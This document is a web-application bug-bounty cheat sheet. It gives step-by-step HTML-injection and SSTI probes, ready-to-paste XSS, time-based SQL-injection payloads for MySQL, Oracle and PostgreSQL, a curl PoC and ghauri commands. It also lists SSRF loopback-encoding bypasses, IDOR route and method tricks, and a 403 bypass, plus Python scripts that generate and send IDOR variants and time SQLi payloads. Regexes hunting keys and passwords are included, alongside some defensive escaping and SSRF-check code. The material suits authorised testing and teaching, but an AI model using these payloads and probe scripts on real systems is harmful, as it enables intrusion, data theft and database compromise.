Manual Testing

⚡ Steps to Reproduce: HTML Injection

  1. Create an account on www.target.com

  2. Then go to the "Edit My Profile" page

  3. In the "Name" field, paste this payload (the second line is a template-injection probe):

<h1>test</h1> <a href="https://google.com">google</a>
{{8*8}}

  4. Log out of the account.

  5. Then go to the "Forgot Password" link and enter the email.

  6. Check the inbox. The password-reset email renders the injected HTML (heading and link) instead of showing it literally; if {{8*8}} comes back as 64, the name is also being evaluated by a template engine (SSTI), which is a separate, more severe finding.

{
  "username": "asad",
  "password": "swag@bugcrowdninja.com",
  "email": "swag@bugcrowdninja.com"
}
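The bug behind those steps is a stored display name concatenated into the reset mail's HTML without escaping. The following is an added example, not code from the page or from any target: a hypothetical reset-mail template (the real one is not on the page) rendered once as the vulnerable app would and once with output escaping, plus the step-6 checks a tester runs on the received body. The payload is the one from step 3.

```python
import html
from string import Template

# Payload from step 3 above (constructed input; second line is an SSTI probe).
PAYLOAD = '<h1>test</h1> <a href="https://google.com">google</a>\n{{8*8}}'

# Assumed reset-mail template; the real application's template is not on the page.
_RESET_TEMPLATE = Template(
    "<p>Hi $name,</p>\n"
    '<p>Reset your password here: <a href="$link">$link</a></p>'
)


def render_reset_email(name: str, link: str, escape: bool) -> str:
    """Build the HTML body of a password-reset mail.

    escape=False reproduces the bug: the stored display name is dropped into
    HTML as-is, so any markup in it is rendered by the mail client.
    escape=True is the fix: HTML-escape every untrusted value at the point it
    enters HTML.  html.escape(..., quote=True) also escapes quotes, so the same
    call is safe inside attribute values such as href.
    """
    if escape:
        name = html.escape(name, quote=True)
        link = html.escape(link, quote=True)
    return _RESET_TEMPLATE.substitute(name=name, link=link)


def html_injection_confirmed(body: str) -> bool:
    """Step 6 check: the injected tags survive unescaped in the delivered mail."""
    return "<h1>test</h1>" in body and 'href="https://google.com"' in body


def ssti_suspected(body: str) -> bool:
    """Heuristic for the {{8*8}} probe: it is gone and a 64 appeared in its place.
    Treat a hit as a lead to confirm with an engine-specific probe, not as proof."""
    return "{{8*8}}" not in body and "64" in body


if __name__ == "__main__":
    link = "https://www.target.com/reset?token=EXAMPLE"  # placeholder link
    vulnerable = render_reset_email(PAYLOAD, link, escape=False)
    fixed = render_reset_email(PAYLOAD, link, escape=True)
    print("vulnerable build renders HTML:", html_injection_confirmed(vulnerable))
    print("escaped build renders HTML:   ", html_injection_confirmed(fixed))
```

The escaped build shows the literal text `<h1>test</h1>` in the mail client, which is the behaviour to ask for in the fix; escaping must happen where the value is placed into HTML, not on input, because the same name may later be emitted into JSON or plain text.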

Find LFI & SSRF & Open Redirect Parameters : Burp Regex (the leading ? must be escaped; an unescaped ? at the start of a pattern is a syntax error in Burp's Java regex engine)

\?.*=(//?\w+|\w+/|\w+(%3A|:)(/|%2F)|%2F|[.\w]+.\w{2,4}[^\w])

Find IDOR Parameters: Burp Regex

(?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)

Find Sensitive Data (keys, tokens, passwords) : Burp Regex

(?i)(access_key|accessKeyId|accessKeySecret|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_key|cloudinary_api_secret|cloudinary_name|codecov_token|config|conn.login|connectionstring|consumer_key|consumer_secret|credentials|cypress_record_key|database_password|database_schema_test|datadog_api_key|datadog_app_key|db_password|db_server|db_username|dbpasswd|dbpassword|dbuser|deploy_password|digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd|docker_password|dockerhub_password|dockerhubpassword|dot-files|dotfiles|droplet_travis_password|dynamoaccesskeyid|dynamosecretaccesskey|elastica_host|elastica_port|elasticsearch_password|encryption_key|encryption_password|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey)['" ]+(=|:)
(?i)([a-z0-9]+){0,}((_|-){0,}(\s){0,})(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)(\s){0,}(=|:|is|>){1,}
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_key|cloudinary_api_secret|cloudinary_name|codecov_token|config|conn.login|connectionstring|consumer_key|consumer_secret|credentials|cypress_record_key|database_password|database_schema_test|datadog_api_key|datadog_app_key|db_password|db_server|db_username|dbpasswd|dbpassword|dbuser|deploy_password|digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd|docker_password|dockerhub_password|dockerhubpassword|dot-files|dotfiles|droplet_travis_password|dynamoaccesskeyid|dynamosecretaccesskey|elastica_host|elastica_port|elasticsearch_password|encryption_key|encryption_password|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey)[a-z0-9_ .\-,]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z\-_=]{8,64})['\"]
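To see what these patterns actually flag before trusting them in a large Burp history, run them over a few constructed URLs and response lines. This is an added example, not code from the page: it compiles the LFI/SSRF/open-redirect regex (with its leading ? escaped), the IDOR regex and the short secret-keyword regex for Python's re module, which accepts them unchanged, and applies them to hypothetical app.example.com traffic. It also shows the IDOR pattern's known false positive: any parameter name ending in "id", such as valid.

```python
import re

# The three Burp regexes from the notes above, compiled for Python's re module.
# The first needs its leading '?' escaped: an unescaped '?' at the start of a
# pattern is a syntax error in both Java (Burp) and Python.
LFI_SSRF_REDIRECT_RE = re.compile(
    r"\?.*=(//?\w+|\w+/|\w+(%3A|:)(/|%2F)|%2F|[.\w]+.\w{2,4}[^\w])"
)
IDOR_RE = re.compile(r"""(?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)""")
SECRET_RE = re.compile(
    r"(?i)([a-z0-9]+){0,}((_|-){0,}(\s){0,})"
    r"(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)"
    r"(\s){0,}(=|:|is|>){1,}"
)

# Constructed sample traffic (hypothetical host, not a real target).
SAMPLE_URLS = [
    "https://app.example.com/download?file=/etc/passwd",         # absolute path value
    "https://app.example.com/login?next=//evil.example",          # protocol-relative redirect
    "https://app.example.com/fetch?url=http://169.254.169.254/",  # full URL value
    "https://app.example.com/view?template=main.html&v=1",        # file-name value
    "https://app.example.com/api/user?user_id=12345",             # numeric ID only
    "https://app.example.com/search?q=hello",                     # plain string
]
SAMPLE_LINES = [
    "AWS_SECRET_ACCESS_KEY=EXAMPLEKEY0000000000",   # constructed, not a real credential
    "db_password: hunter2",
    "Content-Type: text/html; charset=utf-8",
    "<link href=/static/main.css>",
]


def flag_urls(urls):
    """URLs whose parameter values look like paths, URLs or file names."""
    return [u for u in urls if LFI_SSRF_REDIRECT_RE.search(u)]


def idor_params(url):
    """Parameter names the IDOR regex flags in one URL (anything ending in 'id')."""
    return [m.group(0).split("=", 1)[0].strip() for m in IDOR_RE.finditer(url)]


def secret_lines(lines):
    """Lines containing a secret-looking keyword followed by a separator."""
    return [line for line in lines if SECRET_RE.search(line)]


if __name__ == "__main__":
    for u in flag_urls(SAMPLE_URLS):
        print("path/URL-like parameter:", u)
    print("IDOR candidates:", idor_params("https://app.example.com/x?valid=true&user_id=7"))
    for line in secret_lines(SAMPLE_LINES):
        print("secret-looking line:", line)
```

The first pattern is deliberately broad (it fires on any value containing a slash, a scheme or a dotted file name), so the output is a triage list to test by hand, not a finding. Python's re and Java's regex engine agree on everything these three patterns use, so the same matches appear in Burp.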
403 bypass: /register -> 403, /register?cb=titifelbro47 -> 200 (a junk query parameter can slip past a path-based block or cache rule)
IDOR
api/user/2124 -> also try the ID as a query parameter: ?user=2124
try /api/;/private/user/21316623
try /resource/123,124 or /123,122/ to return multiple records.
try /api/private/user/x-user-id:21316625, user=12345, id=12345, user_id=12345 (the ID in a header or under other parameter names).
try /api/private/user/12345, /api/private/user/profile/12345, /profile/12345, etc. (the same object on other routes).
try path tricks: inject ;, ;/, //, or ../ style separators (e.g. /api/;/private/user/12345) to confuse routers.
try OPTIONS, HEAD, POST, PUT, PATCH, DELETE (sometimes endpoints validate IDs only on GET).
Remove cookies: delete the session cookie or replace
Try playing with sessionid= parameters, because some web apps tie the userid to the session
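The IDOR checklist above is the same handful of transformations applied to every object route, so it is worth scripting. The following is an added example, not code from the page: a generator that turns one route template plus a victim ID and the tester's own ID into the request variants the list describes (every method, router-confusing separators, multiple IDs, the ID smuggled into a header or query while the path still names the tester's own object), and a small urllib sender that returns status and body length for diffing. The route /api/private/user/{id}, the IDs and the header name X-User-Id are placeholders.

```python
import urllib.error
import urllib.request
from typing import Dict, Iterator, Tuple

Variant = Tuple[str, str, Dict[str, str]]  # (method, path, extra headers)
METHODS = ("GET", "OPTIONS", "HEAD", "POST", "PUT", "PATCH", "DELETE")


def idor_variants(path_template: str, victim_id: str, my_id: str) -> Iterator[Variant]:
    """Yield requests to send with the attacker's own session, each probing a
    different way an object-level authorisation check can be skipped."""
    # 1. victim ID in the normal place, every method (ID checks are often GET-only)
    plain = path_template.format(id=victim_id)
    for method in METHODS:
        yield method, plain, {}
    # 2. router-confusing separators in front of each later path segment,
    #    e.g. /api/;/private/user/ID, /api//private/user/ID, /api/../private/user/ID
    segs = [s for s in plain.split("/") if s]
    for i in range(1, len(segs)):
        for sep in ("/;/", "//", "/../", "/;"):
            yield "GET", "/" + "/".join(segs[:i]) + sep + "/".join(segs[i:]), {}
    # 3. several IDs at once (some ORMs split the segment on commas)
    for ids in (f"{victim_id},{my_id}", f"{my_id},{victim_id}"):
        yield "GET", path_template.format(id=ids), {}
    # 4. own (authorised) object in the path, victim ID smuggled elsewhere
    mine = path_template.format(id=my_id)
    yield "GET", mine, {"X-User-Id": victim_id}  # hypothetical header name
    yield "GET", f"{mine}?user={victim_id}&id={victim_id}&user_id={victim_id}", {}


def probe(base_url: str, session_cookie: str, variant: Variant) -> Tuple[int, int]:
    """Send one variant with the attacker's session; return (status, body length).
    Compare with the same request for my_id: a 200 carrying the victim's data,
    or a body the size of the victim's profile, is the IDOR."""
    method, path, extra = variant
    headers = {"Cookie": session_cookie, **extra}
    req = urllib.request.Request(base_url + path, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as e:
        return e.code, len(e.read())


if __name__ == "__main__":
    # Placeholder route and IDs; no request is sent here.
    for variant in idor_variants("/api/private/user/{id}", "21316623", "12345"):
        print(*variant)
```

Run probe() over the generator with a session for an account you own, and treat any variant whose status or body length differs from the plain victim-ID request as worth a manual look; a 405 on PUT or DELETE is still useful, because it tells you which methods the route even has.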
SSRF (alternative spellings of 127.0.0.1 / 0.0.0.0 and the cloud metadata host that get past string-match blocklists)
- http://[::]:8080/
- http://00000
- http://2130706433
- http://0x7f.1
- http://metadata
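Those five URLs work because a filter compares strings while the HTTP client hands the host to inet_aton-style parsing, which accepts a single 32-bit integer, hex and octal parts, and "short" dotted forms. The following is an added example, not code from the page: a naive blocklist that every payload above defeats, next to a checker that canonicalises the host the way the client will (a re-implementation of the classic inet_aton rules, so it runs the same on every platform) and classifies it by address range. Hostnames such as metadata come back as "resolve", meaning the caller must resolve them and re-check the resolved address, and repeat that on every redirect.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# The bypass forms listed above (constructed inputs for the demo).
SSRF_PAYLOADS = [
    "http://[::]:8080/",
    "http://00000",
    "http://2130706433",
    "http://0x7f.1",
    "http://metadata",
]


def naive_blocklist(url: str) -> bool:
    """The kind of string match those payloads are built to get past."""
    return any(bad in url.lower() for bad in ("127.0.0.1", "localhost", "169.254.169.254"))


_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def inet_aton_style(host: str):
    """Parse an IPv4 literal the way BSD inet_aton() (and hence most HTTP clients)
    does: 1 to 4 dot-separated parts, each decimal, octal (leading 0) or hex (0x);
    the last part fills all remaining bits.  Returns an IPv4Address, or None when
    host is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    values = []
    for p in parts:
        if p[:2].lower() == "0x":
            values.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            values.append(int(p, 8))
        else:
            values.append(int(p))
    last_bits = 32 - 8 * (len(values) - 1)
    if any(v > 255 for v in values[:-1]) or values[-1] >= (1 << last_bits):
        return None
    n = 0
    for v in values[:-1]:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << last_bits) | values[-1])


def classify_url(url: str) -> str:
    """'blocked' for literals in loopback/private/link-local/unspecified/reserved
    ranges, 'resolve' for hostnames (resolve, then re-run the range check on the
    resolved address, and again after every redirect), 'ok' for public literals."""
    host = urlsplit(url).hostname  # lower-cased, brackets and port removed
    if not host:
        return "blocked"
    try:
        addr = ipaddress.ip_address(host)  # strict dotted-quad or IPv6 only
    except ValueError:
        addr = inet_aton_style(host)       # the forms ipaddress rejects but clients accept
    if addr is None:
        return "resolve"
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped            # ::ffff:127.0.0.1 is loopback too
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast):
        return "blocked"
    return "ok"


if __name__ == "__main__":
    for u in SSRF_PAYLOADS:
        print(f"{u:24} naive blocklist: {naive_blocklist(u)!s:5} canonical check: {classify_url(u)}")
```

Python's own socket.inet_aton accepts the same forms on Linux, but its behaviour is platform-defined, which is why the parser is spelled out here. The "resolve" result is the important half of the fix: checking the hostname string and then letting the client resolve it separately leaves DNS rebinding and redirects open.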
XSS
'"/><img src=x onerror=frames['alert'](document["domain"])>
SQLI (a boolean tautology, then time-based blind payloads per DBMS)
1=1--+-
'XOR(603*if(now()=sysdate(),sleep(6),0))XOR'Z  (MySQL)
'XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR'Z  (MySQL, commas URL-encoded)
'XOR(94102*if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z  (MySQL, commas URL-encoded)
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)  (MySQL, numeric context)
'and 1=DBMS_PIPE.RECEIVE_MESSAGE(1,10)--  (Oracle)
''||(select 1 from (select pg_sleep(6))x)||'  (PostgreSQL)
'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z  (MySQL)
'XOR(if(now()=sysdate(),sleep(20),0))OR'  (MySQL)

SQLI Proof of Concept (PoC):

Confirm it manually with curl. The -w option prints the total time, which should come back about 6 s longer than the same request sent without the payload:

curl -s -w "Total time: %{time_total}\n" \
'https://target.com/endpoint.php' \
-X POST -i --insecure \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: https://target.com/' \
-H 'Cookie: PHPSESSID=xxxxxx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d "approval=true&inputCellPhone=555-666-0606&inputEmail=test@example.com&inputFirstName=John&inputLastName=Doe&inputSecurityAnswer=1&inputSecurityQuestion=1&subscription_list%5B%5D=6030'XOR(603*if(now()=sysdate(),sleep(6),0))XOR'Z"
ghauri -r req.txt --random-agent --current-user --current-db
Don't forget to mark the custom injection point with * in the saved request file.
ghauri -u  --level 3 --random-agent --batch --confirm --time-sec=10 --delay 5 --dbms=mysql
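A single timed curl is easy to misread on a slow or cached endpoint, so the practitioner's version of the PoC above interleaves baseline and payload requests and compares medians. The following is an added example, not code from the page or from ghauri: constructed request bodies modelled on the curl command (same form fields, the MySQL sleep(6) payload only in subscription_list[]), a urllib-based timer with the same headers the curl sends, the confirmation rule, and a fake backend so the logic can be exercised offline. The URL and cookie are placeholders.

```python
import statistics
import time
import urllib.error
import urllib.request
from typing import Callable, Tuple

# Constructed bodies modelled on the curl PoC: identical except that the second
# carries the time-based payload in subscription_list[].  Sent raw, as curl -d does.
BASELINE_BODY = "approval=true&inputEmail=test%40example.com&subscription_list%5B%5D=6030"
PAYLOAD_BODY = (
    "approval=true&inputEmail=test%40example.com&subscription_list%5B%5D="
    "6030'XOR(603*if(now()=sysdate(),sleep(6),0))XOR'Z"
)
HEADERS = {  # same headers as the curl command; cookie value is a placeholder
    "X-Requested-With": "XMLHttpRequest",
    "Referer": "https://target.com/",
    "Cookie": "PHPSESSID=xxxxxx",
    "Content-Type": "application/x-www-form-urlencoded",
}


def http_timer(url: str, headers: dict) -> Callable[[str], float]:
    """Return a sender that POSTs a body to url and reports wall-clock seconds.
    The status code is ignored on purpose: an error page that took 6 s still counts."""
    def send(body: str) -> float:
        req = urllib.request.Request(url, data=body.encode(), headers=headers, method="POST")
        start = time.perf_counter()
        try:
            urllib.request.urlopen(req, timeout=60).read()
        except urllib.error.HTTPError as e:
            e.read()
        return time.perf_counter() - start
    return send


def confirm_time_based(send: Callable[[str], float], baseline: str, payload: str,
                       sleep_seconds: float, samples: int = 3,
                       tolerance: float = 0.8) -> Tuple[bool, float]:
    """Send baseline and payload `samples` times each, interleaved so load changes
    hit both, and call it confirmed only when the median payload time exceeds the
    median baseline time by at least tolerance * sleep_seconds.  Medians over
    several samples stop one slow baseline or one cached fast response from
    producing a false result.  Returns (confirmed, measured delta in seconds)."""
    base_times, payload_times = [], []
    for _ in range(samples):
        base_times.append(send(baseline))
        payload_times.append(send(payload))
    delta = statistics.median(payload_times) - statistics.median(base_times)
    return delta >= tolerance * sleep_seconds, delta


def fake_backend(sleep_seconds: float) -> Callable[[str], float]:
    """Constructed stand-in for the target: ~0.2 s normally, plus the sleep when
    the payload's IF(...) branch fires.  Lets the rule be checked offline."""
    def send(body: str) -> float:
        return 0.2 + (sleep_seconds if "sleep(" in body.lower() else 0.0)
    return send


if __name__ == "__main__":
    # Offline demonstration; swap in http_timer("https://target.com/endpoint.php", HEADERS)
    # to run it against a real endpoint.
    ok, delta = confirm_time_based(fake_backend(6.0), BASELINE_BODY, PAYLOAD_BODY, sleep_seconds=6)
    print(f"confirmed={ok} delta={delta:.1f}s")
```

Raise `samples` on noisy targets rather than lowering `tolerance`; a delta that sits just under the sleep value across five interleaved pairs is a far stronger signal than one curl that happened to take seven seconds.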
